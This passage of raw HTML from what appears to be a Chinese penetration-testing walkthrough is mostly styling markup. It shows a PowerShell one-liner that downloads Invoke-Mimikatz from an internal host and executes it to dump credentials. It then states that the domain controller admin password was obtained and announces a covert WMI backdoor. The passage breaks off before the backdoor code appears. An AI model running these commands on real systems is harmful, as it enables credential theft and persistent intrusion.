font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">再次运行：</p><div id="crayon-5c25a60d4f813477546057" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div></div></td><td class="crayon-code" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center; text-align: left; width: 896px;"><div class="crayon-pre" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; text-align: left; color: rgb(0, 0, 0); white-space: pre; overflow: visible; tab-size: 4; line-height: 15px !important;"><div class="crayon-line" id="crayon-5c25a60d4f813477546057-1" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: inherit; line-height: inherit !important;">&nbsp;&nbsp;&nbsp;<span class="crayon-i" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">IEX</span>&nbsp;<span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-r" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 0, 0) !important;">New</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-t" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: bold !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(128, 0, 128) !important;">Object</span>&nbsp;<span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Net</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">WebClient</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">.</span><span class="crayon-e" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: teal !important;">DownloadString</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">(</span><span class="crayon-s" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(221, 17, 68) !important;">&#39;http://10.101.101.16/nishang/Gather/Invoke-Mimikatz.ps1&#39;</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">)</span><span class="crayon-sy" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(51, 51, 51) !important;">;</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Invoke</span><span class="crayon-o" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 111, 224) !important;">-</span><span class="crayon-v" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important; color: rgb(0, 45, 122) !important;">Mimikatz</span></div></div></td></tr></tbody></table></div></div><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;"><img src="https://ws1.sinaimg.cn/large/c334041bgy1fj7hfvkcvgj21gg0rdhdt.jpg" alt="" style="box-sizing: border-box; margin: 0px auto; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 18px; font-family: inherit; vertical-align: middle; background: transparent; display: block; max-width: 100%; height: auto;"/></p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">&nbsp;</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">成功得到域控管理员的密码，下面我们要在域控上面安装一个隐蔽的后门</p><p style="box-sizing: border-box; margin: 0px 0px 30px; padding: 0px; border: 0px; font-weight: 400; font-style: normal; font-size: 18px; font-family: "Open Sans", Arial, "Hiragino Sans GB", "Microsoft YaHei", 微软雅黑, STHeiti, "WenQuanYi Micro Hei", SimSun, sans-serif; vertical-align: baseline; background: rgb(255, 255, 255); color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;">这里利用三好学生的方法制作一个&nbsp;wmi&nbsp;的后门：</p><div id="crayon-5c25a60d4f81a114883418" class="crayon-syntax crayon-theme-github crayon-font-monaco crayon-os-mac print-yes notranslate" style="box-sizing: border-box; margin: 12px 0px; padding: 0px; border: 1px solid rgb(222, 222, 222) !important; font-weight: 500; font-style: normal; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace; vertical-align: baseline; background-image: initial; background-position: initial; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(248, 248, 255) !important; text-align: left; text-size-adjust: none; overflow: hidden !important; position: relative !important; direction: ltr !important; width: 620px; line-height: 15px !important; color: rgb(51, 51, 50); font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial; height: auto;"><div class="crayon-toolbar" style="box-sizing: border-box; margin: 0px; padding: 0px; border-top: 0px; border-right: 0px; border-bottom: 1px solid rgb(222, 222, 222) !important; border-left: 0px; border-image: initial; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left; width: 618px; position: relative; overflow: hidden; z-index: 4; height: 18px !important; line-height: 18px !important;"><span class="crayon-title" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;"></span><div class="crayon-tools" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 12px !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: left; height: 18px !important; line-height: 18px !important; position: absolute; right: 0px;"><span class="crayon-mixed-highlight" style="box-sizing: border-box; margin: 0px; padding: 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: transparent; height: inherit; line-height: inherit !important;"></span><span class="crayon-language" style="box-sizing: border-box; margin: 0px; padding: 0px 8px 0px 4px !important; border: 0px; font-weight: inherit !important; font-style: inherit; font-size: 9.6px; font-family: inherit; vertical-align: baseline; background: transparent; float: left; height: inherit; line-height: inherit !important; color: rgb(102, 102, 102) !important;">Default</span></div></div><div class="crayon-plain-wrap" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; height: auto !important;"></div><div class="crayon-main" style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; width: 618px; overflow: hidden; position: relative; z-index: 1;"><table class="crayon-table" style="box-sizing: border-box; margin-top: 0px !important; margin-right: 0px !important; margin-bottom: 0px !important; margin-left: 0px; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: none !important; border-collapse: collapse !important; border-spacing: 0px !important; width: auto !important; table-layout: auto !important;"><tbody style="box-sizing: border-box; margin: 0px; padding: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: transparent;"><tr class="crayon-row" style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: none !important; font-weight: inherit; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background: 0px center;"><td class="crayon-nums " style="box-sizing: border-box; margin: 0px !important; padding: 0px !important; border: 0px; font-weight: normal; font-style: inherit; font-size: 12px; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: top !important; background-image: initial; background-position: 0px center; background-size: initial; background-repeat: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: rgb(238, 238, 238) !important; text-align: left;"><div class="crayon-nums-content" style="box-sizing: border-box; margin: 0px; padding-top: 5px !important; padding-right: 0px; padding-bottom: 3px !important; padding-left: 0px; border: 0px; font-weight: inherit; font-style: inherit; font-size: 12px !important; font-family: Monaco, MonacoRegular, "Courier New", monospace !important; vertical-align: baseline; background: 0px center; text-align: left; white-space: nowrap; line-height: 15px !important;"><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">1</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">2</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">3</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">4</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">5</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">6</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">7</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">8</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">9</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">10</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">11</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">12</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">13</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">14</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">15</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">16</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">17</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">18</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">19</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">20</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">21</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">22</div><div class="crayon-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; line-height: inherit !important; min-width: 1.2em !important; color: rgb(170, 170, 170) !important;">23</div><div class="crayon-num crayon-striped-num" style="box-sizing: border-box; margin: 0px; padding: 0px 5px; border-top: 0px; border-right: 1px solid rgb(222, 222, 222) !important; border-bottom: 0px; border-left: 0px; border-image: initial; font-weight: inherit !important; font-style: inherit; font-size: inherit !important; font-family: inherit; vertical-align: baseline; background: 0px center; text-align: right !important; height: inherit; 